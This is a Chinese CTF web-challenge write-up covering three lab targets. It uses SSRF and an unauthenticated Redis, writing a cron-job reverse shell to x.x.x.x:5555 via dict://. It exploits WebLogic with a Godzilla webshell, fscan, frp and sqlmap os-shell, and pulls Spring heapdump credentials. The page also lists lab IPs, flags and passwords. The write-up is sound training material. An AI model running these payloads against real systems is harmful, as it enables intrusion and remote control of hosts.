首页 > 其他分享 >CTF之web题集详情随手笔记

CTF之web题集详情随手笔记

时间:2024-11-02 10:45:36浏览次数:3  
标签:43.137 web 题集 flag 6379 CTF 240.7 172.19 直接


《Web安全》icon-default.png?t=O83Ahttp://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247484238&idx=1&sn=ca66551c31e37b8d726f151265fc9211&chksm=c0e47a12f793f3049fefde6e9ebe9ec4e2c7626b8594511bd314783719c216bd9929962a71e6&scene=21#wechat_redirect

1     WEB 1

图片

靶场目标:http://43.137.34.103/

图片

可以直观的看到一个爬虫类的网页。用我犀利的眼就能很明显感觉到可能存在SSRF漏洞,所以接下来我直接就看看能不能爬取百度或者当前的网页

直接就跳转了,这里思路直接就使用file命里查看文件。

图片

图片

等到passwd文件和hosts头,判断内网ip范围为172.19.240.0

flag文件在根目录下面

图片

flag1:meetsec1{6d5e5c2bb397ba7727b58df59b35f66a}

接下来是进行内网探测,看看存在其他服务不,可以直接使用ssrfmap工具

这里还是手工做,用bp的自定义迭代器扫描,写一个小脚本

图片

图片

题目提示是数据库服务,但我晚上做的时候两个小时也没有扫出来服务,最后常用端口扫

描,才发现存在一个redis,属于是被绕到了,忘了redis也是数据库

图片

内网探活,172.19.240.7:6379服务,这里应该是redis未授权

图片

图片

图片

得到了第二个flag:meetsec2{2b7cc5b73fe867cc83546583b858c8ab}

第三个flag存在于这台主机的根目录,所以这里就用计划任务上线

dict://172.19.240.7:6379/flushalldict://172.19.240.7:6379/config set dir /var/spool/cron/dict://172.19.240.7:6379/config set dbfilename rootdict://172.19.240.7:6379/set xshell "\n* * * * * /bin/bash -i >&/dev/tcp/x.x.x.x/5555 0>&1\n"dict://172.19.240.7:6379/save

图片

第三个flag:meetsec3{f22eec9fb7c498b3a747392ff53a746b}

2     WEB 2

图片

靶场目标43.137.34.103:7001

图片

这个界面,基本都是weblogic服务,直接就查看什么版本

图片

用专门的漏扫看看有没有存在历史漏洞

图片

图片

图片

第一个flag:meetsec1{3e942fd37767def3a9f68cf5ee6ebee5}

第二个flag在内网的第二台主机中,这里先上个哥斯拉

图片

图片

图片

直接上传一个fscan,扫一下内网服务

图片

图片

网段为172.16.10.0/24和172.25.20.0/24

图片

图片

图片

这里不知道是不是,我扫描器的问题,还是靶场的问题,我在备用目标中,才把3306扫出

来,第一个目标并没有扫出来。

这里的到目标是172.25.20.12:3306,通过frp,接入内网

图片

图片

接入到内网中,这里流量时全局,直接用kali,打一手爆破试试

图片

图片

不过在半个小时后,我感觉到了,这里似乎不是弱口令爆破,weblogic可以用jdbc做数据源

连接,可能是做的一个站库分离的操作

图片

在jdbc连接里面找到了数据库的账户和加密密文,从官网查看了解,可以使用官方的解密工

具得到明文,不过需要拿到,一个bat文件

图片

得到密码Meetsec#1024,账户root

用navicat直接连接

图片

得到第二个flag

第三个flag在主机根目录下,这里用sqlmap远程连接os-shell

图片

图片

meetsec3{2e947aef43be6dc428a9c626ba7fb824}

本来想今天把第四个flag拿了的,但是环境打不开了,一直卡住,接下来想从os-shell反弹

shell,在上传文件,扫描第三个内网段

明天看看还能不能打开吧。

3    WEB 3 4

图片

目标43.137.9.106:22883、43.137.9.106:13306

web3给的两个地址,第一个flag是信息泄露,第二个flag是存在数据库中

打开第一个网站界面

图片

看不出东西来,直接扫一下目录试试

图片

从地址看,基本上就是spring的框架,直接看看env变量的文件

图片

得到第一个信息泄露的flag:meetsec1{e20cdd96b8985a3557e5720726bb09a8}

不过也得到了,第二个flag的线索,jdbc连接,数据保留在heapdump里,账户是meetsec

所以下面就是看看这个heapdump怎么解密,

图片

图片

图片

得到密码为MeetSec@2nd!2022

直接用navicat连接

图片

得到第二个flag meetsec2{9edbd4b03b5f86a9abe079bc63ea847b}

标签:43.137,web,题集,flag,6379,CTF,240.7,172.19,直接
From: https://blog.csdn.net/jxiang213/article/details/143447446

相关文章

  • 解释 RESTful API,以及如何使用它构建 web 应用程序。
    RESTfulAPI(RepresentationalStateTransfer)是一种设计风格,用于构建可扩展的网络服务。它基于HTTP协议,并使用标准的HTTP方法(例如GET、POST、PUT、DELETE)来实现对资源的创建、读取、更新和删除操作。RESTfulAPI的关键原则是将服务端的资源通过URL(统一资源定位符)暴露给......
  • Web组件之 Listener (监听器)
    文章目录1.1Listener概述1.2Listener快速入门①xml版本②注解版本1.3案例:模拟spring框架1.1Listener概述​JavaWeb中的监听器是监听ServletContextHttpSessionHttpServletRequest三个数据域对象创建和销毁以及监听数据域对象中数据的变化,就是监听......
  • StableDiffusionWebUI 让我找到了宫崎骏动漫里的夏天
    前言一直以来想部署一个自己的StableDiffusion模型,但是在构建模型过程中遇到许多问题,后来发现可以用HAI可以快速构建并且部署,给我带来了极大的便利,省去了许多麻烦事。高性能应用服务(HyperApplicationInventor,HAI)是一款面向AI和科学计算的GPU/NPU应用服务产品,提供即插即用......
  • Java Web和Java有什么区别
    JavaWeb和Java都是Java编程语言的应用范畴,但它们有着根本的区别。主要包括:1.应用领域不同;2.技术栈和库的差异;3.开发工具和环境的不同;4.运行环境的区别;5.学习曲线的差异;6.与数据库的交互;7.安全性要求。Java主要关注核心编程,而JavaWeb专注于基于Java的网络应用开发。1、应用领......
  • Websocket整合实现聊天操作
    在实际开发中,尤其是web开发,我该如何做才可以实现消息或者数据的实时更新呢。这里我为大家介绍,websocket长连接,它可以简历连接,且创建一个通道,通道中的数据可以实时更新。废话不多说,接下来我将使用vue+springboot基于websocket来实现一个简单的聊天实现。vue前端代码,这里主要......
  • 猿人学web端爬虫攻防大赛赛题第15题——备周则意怠-常见则不疑
    题目网址:https://match.yuanrenxue.cn/match/15解题步骤看触发的数据包。有个m参数,一看就是经过处理的,我们得知道m是如何组成的。看Initiator模块。还是看request函数,往上一看就看到了m的赋值操作。打断点,触发。看下window.m()的定义。比较好理解的,t1和t......
  • CTF顶级工具与资源
    《Web安全》http://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247484238&idx=1&sn=ca66551c31e37b8d726f151265fc9211&chksm=c0e47a12f793f3049fefde6e9ebe9ec4e2c7626b8594511bd314783719c216bd9929962a71e6&scene=21#wechat_redirect《网安面试指南》http:/......
  • ctf web赛道基础 万字笔记
    《Java代码审计》http://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247484219&idx=1&sn=73564e316a4c9794019f15dd6b3ba9f6&chksm=c0e47a67f793f371e9f6a4fbc06e7929cb1480b7320fae34c32563307df3a28aca49d1a4addd&scene=21#wechat_redirect《Web安全》http......
  • [ACTF2020 新生赛]Include
    链接:https://buuoj.cn/challenges#[ACTF2020新生赛]Include。打开环境后如下,只有一个"tips"的超链接。访问tips,留意传入了"file"参数。接下来,可以尝试下路径穿越:?file=flag.php../../../../../etc/passwd。可以看到,存在路径穿越漏洞,但是通过路径穿越漏洞并没有读取到......
  • [ACTF2020 新生赛]Exec
    题目链接:https://buuoj.cn/challenges#[ACTF2020新生赛]Exec。打开后,环境如下。尝试输入"127.0.0.1",抓取请求包。POST/HTTP/1.1Host:038dc28f-5191-4958-8946-1127f62ad770.node5.buuoj.cn:81Content-Length:16Cache-Control:max-age=0Upgrade-Insecure-Requests:......